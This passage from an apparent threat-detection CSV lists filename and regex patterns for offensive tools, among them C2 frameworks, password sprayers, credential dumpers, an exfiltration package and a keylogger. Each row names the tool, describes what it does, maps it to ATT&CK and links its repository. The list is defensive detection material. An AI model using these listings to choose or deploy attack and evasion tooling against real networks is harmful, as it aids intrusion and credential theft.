Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" 
"*\SingleDose.sln*",".{0,1000}\\SingleDose\.sln.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\SingleDose-main.zip*",".{0,1000}\\SingleDose\-main\.zip.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\sitadel.log*",".{0,1000}\\sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*\slinky.py*",".{0,1000}\\slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\slip.py *",".{0,1000}\\slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*\slip-main.zip",".{0,1000}\\slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI 
tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*\sliver.exe*",".{0,1000}\\sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client.exe*",".{0,1000}\\sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client_windows.exe*",".{0,1000}\\sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*\sliver-client_windows-386*.exe*",".{0,1000}\\sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client_windows-amd64*.exe*",".{0,1000}\\sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client_windows-arm64*.exe*",".{0,1000}\\sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliverpb.Exe*",".{0,1000}\\sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - 
T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\SlowPathMITM.py*",".{0,1000}\\SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\smartbrute\*",".{0,1000}\\smartbrute\\.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*\smartbrute-main*",".{0,1000}\\smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*\SMB_RPC\*.py",".{0,1000}\\SMB_RPC\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\smb_SCNotification.exe*",".{0,1000}\\smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\SMB_Staging.c*",".{0,1000}\\SMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\SMBGrab.pl*",".{0,1000}\\SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*\SMBHunt.pl*",".{0,1000}\\SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of 
the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*\SMBList.pl*",".{0,1000}\\SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*\smbmap.py*",".{0,1000}\\smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\smbrelayserver.py*",".{0,1000}\\smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*\smbsr.db*",".{0,1000}\\smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" 
"*\smbsr.log*",".{0,1000}\\smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\smbsr.py*",".{0,1000}\\smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\smbsr_results.csv*",".{0,1000}\\smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\Smeagol.log*",".{0,1000}\\Smeagol\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\smuggler.py*",".{0,1000}\\smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" 
"*\Snaffler.exe*",".{0,1000}\\Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\snaffler.py*",".{0,1000}\\snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*\sniff.py*",".{0,1000}\\sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\sniffers\sniffer.py*",".{0,1000}\\sniffers\\sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\SOAPHound.csproj*",".{0,1000}\\SOAPHound\.csproj.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound.exe*",".{0,1000}\\SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound.sln*",".{0,1000}\\SOAPHound\.sln.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" 
"*\SOAPHound\Enums\*",".{0,1000}\\SOAPHound\\Enums\\.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound\Program.cs*",".{0,1000}\\SOAPHound\\Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound-master*",".{0,1000}\\SOAPHound\-master.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\socks5proxy.py*",".{0,1000}\\socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\Software\Kidlogger*",".{0,1000}\\Software\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","registry","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Xworm*",".{0,1000}\\SOFTWARE\\Xworm.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\SortObjectCommand.cs",".{0,1000}\\SortObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\spellbound-main*",".{0,1000}\\spellbound\-main.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellgen.py *",".{0,1000}\\spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spellstager.py *",".{0,1000}\\spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*\spider_plus.py*",".{0,1000}\\spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\spoof.py*",".{0,1000}\\spoof\.py.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*\SpoofCmdLine\TheThing*",".{0,1000}\\SpoofCmdLine\\TheThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*\spoofing-office-macro-master*",".{0,1000}\\spoofing\-office\-macro\-master.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*\spoofIPs_client.py*",".{0,1000}\\spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\spooler.py*",".{0,1000}\\spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\SprayAD.cna*",".{0,1000}\\SprayAD\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" 
"*\SprayAD.exe*",".{0,1000}\\SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*\sprayed-creds.txt*",".{0,1000}\\sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\spray-results.txt*",".{0,1000}\\spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\SQLInfoDumps*",".{0,1000}\\SQLInfoDumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\SQLRecon*",".{0,1000}\\SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation 
Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*\src\check\Credentials.ps1*",".{0,1000}\\src\\check\\Credentials\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*\src\KaynInject.c*",".{0,1000}\\src\\KaynInject\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\src\KaynLdr.c*",".{0,1000}\\src\\KaynLdr\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*\src\KaynStrike.c*",".{0,1000}\\src\\KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\src\links\windows\src\evasion.rs*",".{0,1000}\\src\\links\\windows\\src\\evasion\.rs.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - 
